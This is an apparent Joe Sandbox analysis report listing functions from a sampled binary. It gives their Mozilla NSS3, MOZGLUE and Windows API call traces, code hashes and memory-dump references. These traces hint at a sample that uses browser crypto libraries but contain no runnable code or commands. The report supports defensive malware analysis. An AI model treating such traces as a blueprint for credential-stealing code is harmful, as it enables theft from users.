                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3689625208-0
                                                                                                                                                                                                              • Opcode ID: 5aa697b32d7b93d6ba2a2bd842e3f943f21f3f13d2440b1150b7d4554a15ebf7
                                                                                                                                                                                                              • Instruction ID: 952840a1c62fb4c4131f26415b107e8ace9bfd57090988ff288fdd7ab3700a9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aa697b32d7b93d6ba2a2bd842e3f943f21f3f13d2440b1150b7d4554a15ebf7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D641D671A013059BEB00CE66DD44BBF77B9AF48208F194228E919D7B41FB31E985DBD1
                                                                                                                                                                                                              Function 6CABEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CABEDFD
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000000), ref: 6CABEE64
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CABEECC
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CABEEEB
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CABEEF6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3833505462-0
                                                                                                                                                                                                              • Opcode ID: 5fc5f3c1ca3dbe6afc5d360ef6e8ee74c145d9c477fe6ba202f6e1f5344e81d9
                                                                                                                                                                                                              • Instruction ID: 79b75439016bd7ec1b66e76a69fd3628084bcd3ceef8eb701f1f37fd26b6f8a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fc5f3c1ca3dbe6afc5d360ef6e8ee74c145d9c477fe6ba202f6e1f5344e81d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7313AB1A00240BBE7209F2DCC45B667BF8FB46315F180568F85A97B51D731E894CBE1
                                                                                                                                                                                                              Function 6CB01EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CAE6295,?,00000000,00000000,00000001,6CB02653,?), ref: 6CB01ECB
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,?,?,6CAE6295,?,00000000,00000000,00000001,6CB02653,?), ref: 6CB01EF1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB01F01
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB01F39
                                                                                                                                                                                                                • Part of subcall function 6CB0FE20: TlsGetValue.KERNEL32(6CAE5ADC,?,00000000,00000001,?,?,00000000,?,6CADBA55,?,?), ref: 6CB0FE4B
                                                                                                                                                                                                                • Part of subcall function 6CB0FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB0FE5F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB01F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 704537481-0
                                                                                                                                                                                                              • Opcode ID: c3f5b5b9aef1247d5f9006f5e42c0602add22aca6a9bc541b385c4cdf6c5e9bc
                                                                                                                                                                                                              • Instruction ID: 6ccd2b033bc1c78068cfcabcac7ad0239f6306d2161d8a463361fd137f333068
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3f5b5b9aef1247d5f9006f5e42c0602add22aca6a9bc541b385c4cdf6c5e9bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF21E175B00284ABEF04AE6AEC45E9A3B69EF4536CF184124FD0897B11EB31E954C6E1
                                                                                                                                                                                                              Function 6CAC1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAC1E0B
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAC1E24
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC1E3B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAC1E8A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAC1EAD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1529734605-0
                                                                                                                                                                                                              • Opcode ID: c5422a717426c50bd665e3e9fb89d85c9d9445590fd89d4a6698d957b7add3c7
                                                                                                                                                                                                              • Instruction ID: d8cb848a35545511d0f951b54d1ffc9225cbfe9606921bf46641416d4874fdc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5422a717426c50bd665e3e9fb89d85c9d9445590fd89d4a6698d957b7add3c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F21F172F04250ABDB018EA9DC40BBA73A49B84328F584638EE5D97B80E730D94886D3
                                                                                                                                                                                                              Function 6CACAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000,00000000), ref: 6CACADA7
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000,00000000), ref: 6CACADB4
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6CAC3FFF,?,?,?,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000), ref: 6CACADD5
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBE94B0,?,?,?,?,?,?,?,?,6CAC3FFF,00000000,?), ref: 6CACADEC
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAC3FFF), ref: 6CACAE3C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2372449006-0
                                                                                                                                                                                                              • Opcode ID: fd8d8549cd4aaf33951806410d5e730a438eda9ff3483671903245aa1c10cc0f
                                                                                                                                                                                                              • Instruction ID: dd71d2ab41c3c073db40b8330ba773b0825da987c4567be50892e95829a9a2b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd8d8549cd4aaf33951806410d5e730a438eda9ff3483671903245aa1c10cc0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23117472F002546BE7109B659C04BBF73BCDF9524CF084228EC1996B41FB20EE8882E3
                                                                                                                                                                                                              Function 6CAE8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EA2
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB0F854
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB0F868
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB0F882
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB0F889
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB0F8A4
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB0F8AB
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB0F8C9
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB0F8D0
                                                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EC3
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EDC
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAE8EF1
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAE8F20
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1978757487-0
                                                                                                                                                                                                              • Opcode ID: f8d5e8655072eb2a33280882a522b195a0c0f6ab41b5e504d1bb95be290685ec
                                                                                                                                                                                                              • Instruction ID: 6998dcea2c590ef4410ea397d649ceefb6446d4db95186e068cd6e54554aea3e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8d5e8655072eb2a33280882a522b195a0c0f6ab41b5e504d1bb95be290685ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF217AB0A097059FC700AF29D184699BBF0FF48318F05856EE8989BB41DB30E894DBC2
                                                                                                                                                                                                              Function 009458A3 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3576935931-0
                                                                                                                                                                                                              • Opcode ID: 563e3184c6495c50ecac666c954ffcf006eb9894b5a95410731df57a8999d238
                                                                                                                                                                                                              • Instruction ID: ec5f0ad1e7a320eb8c9159c4c4dd906b233850b5b0069f9869150d43d7745b16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 563e3184c6495c50ecac666c954ffcf006eb9894b5a95410731df57a8999d238
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D11CA32418E15EBDF352FB5AC05F593799AFC43B2B228529FC49D6152DE348D40D790
                                                                                                                                                                                                              Function 6CAECD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: TlsGetValue.KERNEL32 ref: 6CB01E36
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: EnterCriticalSection.KERNEL32(?,?,?,6CADB1EE,2404110F,?,?), ref: 6CB01E4B
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: PR_Unlock.NSS3 ref: 6CB01E76
                                                                                                                                                                                                              • free.MOZGLUE(?,6CAED079,00000000,00000001), ref: 6CAECDA5
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CAED079,00000000,00000001), ref: 6CAECDB6
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CAED079,00000000,00000001), ref: 6CAECDCF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6CAED079,00000000,00000001), ref: 6CAECDE2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAECDE9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1720798025-0
                                                                                                                                                                                                              • Opcode ID: 8b2015baff82689450400667e9e9230dd35f477dfeb1ec9117a7ba623e2b45a4
                                                                                                                                                                                                              • Instruction ID: 1a320f5ded6cc5d52f389aa6c672c76d62f26d64573b10b692f7878a5293bc34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b2015baff82689450400667e9e9230dd35f477dfeb1ec9117a7ba623e2b45a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 261186B2B01115ABDB00AE65EC85A9A7F7CFF0826D7184131F91987E01D732E4B4D7D1
                                                                                                                                                                                                              Function 6CB52CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB52CEC
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52D02
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52D1F
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52D42
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52D5B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                                                              • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                              • Instruction ID: b2c47ce3a579cceac2bbcf46e7c3f3904bd7355b6ba42b09d5f8c3ad52c102b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3801DBB5D022805BEB309E25FC44BCBB7A5EF45318F444525E85E87711E632F425C793
                                                                                                                                                                                                              Function 6CB52D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB52D9C
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52DB2
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52DCF
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52DF2
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52E0B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                                                              • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                              • Instruction ID: c04b3bbfb983cadaed38bafc8a7d989e5a4c211d9a9d11d91ff275c23b0257ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01C4B5E022809BEA309E25FC05BCBB7A5EF41318F440435E85E87B11D632F8398693
                                                                                                                                                                                                              Function 6CBDBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDC3
                                                                                                                                                                                                              • free.MOZGLUE(?,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDCA
